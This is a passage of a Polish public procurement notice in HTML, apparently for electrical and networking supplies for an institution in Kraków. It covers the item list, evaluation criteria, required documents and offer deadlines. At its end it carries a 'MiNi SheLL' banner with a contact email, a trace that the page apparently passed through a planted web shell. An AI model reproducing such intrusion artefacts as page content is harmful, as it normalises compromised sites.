szybkozłącza; biały, kompatybilny z będącym własnością SU osprzętem Simon Basic Standard - 30 szt.<br/>32.	PUSZKA P/T 60MM PKD 60 DO SUCHEGO TYNKU 2 KROTNA - 50	szt.<br/>33.	PUSZKA P/T 60MM PKD 60 DO SUCHEGO TYNKU 3 KROTNA - 50	szt.<br/>34.	Wyłącznik różnicowoprądowy z członem nadprądowym CKN6-16/1/1N/B/003, typ AC, 30mA kompatybilny z będącym własnością SU urządzeniem firmy EATON - 30 szt.<br/>35.	Puszka natynkowa głęboka (40mm) - element rozszerzający do puszki PSC/11 do ramek wielokrotnych; biały, kompatybilna z będącym własnością SU osprzętem Simon Basic Standard - 100 szt.<br/>36.	Puszka natynkowa głęboka (40mm) pojedyncza- element do puszki PSH/11, składana; biały, kompatybilna z będącym własnością SU osprzętem Simon Basic Standard - 50 szt.<br/>37.	Gniazdo wtyczkowe podwójne z uziemieniem (moduł), Σ16A, 250V, zaciski śrubowe; biały, kompatybilne z będącym własnością SU osprzętem Simon Basic Standard - 100	szt.<br/>38.	Gniazdo wtyczkowe z uziemieniem (moduł) 16A, 250V, zaciski śrubowe; kolor czerwony kompatybilne z będącym własnością SU osprzętem Simon Basic Standard - 30	szt.<br/>39.	Łącznik jednobiegunowy (moduł) 10AX, 250V, szybkozłącza; czerwony kompatybilny z będącym własnością SU osprzętem Simon Basic Standard - 30	szt.<br/>40.	Lampa ewakuacyjna zasilana z będącą własnością SU baterii centralnej CrystalWay 220/45 CG-5-LUM22214 A  - 20	szt.<br/>41.	Zasilacz lampy Led FLAT AC240V/DC33-40V (40-42W) - 200 szt.<br/>42.	Zasilacz taśmy Led AC254V/DC12V 30W	- 150 szt.<br/>43.	Zasilacz taśmy Led AC254V/DC12V 50W	- 100 szt.<br/>44.	Taśma Led w silikonie  (8mmx5metrów) DC12V-60x2835 – 4,8W 4200K  	- 15 szt.<br/>45.	Gniazdo stałe z wyłącznikiem 0-1 16A 5P 400V + 2P+Z 230V IP44 - 5 szt.<br/>46.	Kabel instalacyjny typu skrętka kat. 7A S/FTP - 30000 mb<br/>47.	Panel porządkujący 19&#34;&#34; 1U - 40 szt.<br/>48.	Panel rozdzielczy 24xRJ45 1U bez modułów - 40 szt.<br/>49. Moduł RJ45 keystone kat.6A beznarzędziowy - 2000 szt.<br/>50.	Pokrywa gniazd teleinformatycznych na Keystone płaska podwójna - 500 szt. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 255070,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">31680000-6 - Elektryczne artykuły i akcesoria</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty będą oceniane według kryteriów oceny ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt. 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji. <br/>Zgodnie z art. 274 ust. 4 ustawy Zamawiający nie wezwie do złożenia dokumentu, o którym mowa wyżej o ile Wykonawca wskaże w oświadczeniu, o którym mowa w punkcie 10.2.3. SWZ, dane umożliwiające dostęp do tych środków.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Przedmiotowe środki dowodowe potwierdzające, że oferowane dostawy spełniają wymagania Zamawiającego:<br/>Materiały firmowe – np. foldery, katalogi, karty charakterystyki, instrukcja lub/i wyciąg z instrukcji, dokumentacja techniczna, świadectwa rejestracji, oświadczenia producenta – potwierdzające, że oferowane materiały spełniają wymagania określone przez Zamawiającego (parametry wymagane). <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Przedmiotowe środki dowodowe potwierdzające, że oferowane dostawy spełniają wymagania Zamawiającego:<br/>Materiały firmowe – np. foldery, katalogi, karty charakterystyki, instrukcja lub/i wyciąg z instrukcji, dokumentacja techniczna, świadectwa rejestracji, oświadczenia producenta – potwierdzające, że oferowane materiały spełniają wymagania określone przez Zamawiającego (parametry wymagane). <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Do oferty przekazywanej w postaci elektronicznej należy dołączyć następujące dokumenty w postaci elektronicznej, opatrzonej przez Wykonawcę kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym pod rygorem nieważności:<br/>1.1. Wypełniony i podpisany przez osoby upoważnione do reprezentowania wykonawcy formularz oferty, sporządzony według wzoru stanowiącego załącznik nr 1 do SWZ.<br/>1.2. Wypełniony i podpisany przez osoby upoważnione do reprezentowania wykonawcy arkusz cenowy, sporządzony według wzoru stanowiącego załącznik nr 1a do SWZ.<br/>1.3. Aktualne na dzień składania ofert oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu, w zakresie wskazanym w załączniku nr 2 do SWZ.<br/>1.4. Pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania wykonawcy, w postaci elektronicznej opatrzonej przez Wykonawcę kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym pod rygorem nieważności, lub jako cyfrowe odwzorowanie dokumentu opatrzone kwalifikowanym podpisem<br/>elektronicznym, podpisem zaufanym lub podpisem osobistym:<br/>1.4.1. dla osoby/osób podpisującej/cych ofertę do podejmowania zobowiązań w imieniu wykonawcy składającego ofertę, gdy prawo do podpisania oferty nie wynika z odpisu z właściwego rejestru, który Zamawiający może uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 roku o informatyzacji działalności podmiotów realizujących zadania publiczne.<br/>1.4.2. dla ustanowionego pełnomocnika, do reprezentowania w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy – dotyczy wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>1.5. Dokumenty, z których wynika prawo do podpisania oferty - w przypadku, gdy prawo do podpisania oferty nie wynika z odpisu z właściwego rejestru, który Zamawiający może uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 roku o informatyzacji działalności podmiotów realizujących zadania publiczne, względnie innych dokumentów złożonych wraz z ofertą. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Szczegółowe wymagania w tym przedmiocie zostały zawarte w Specyfikacji Warunków Zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Reguluje wzór umowy stanowiący załącznik do specyfikacji. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-10-24 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi dokumentami należy umieścić na platformie zakupowej pod adresem: https://platformazakupowa.pl/pn/su_krakow</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-10-24 11:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-11-22</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com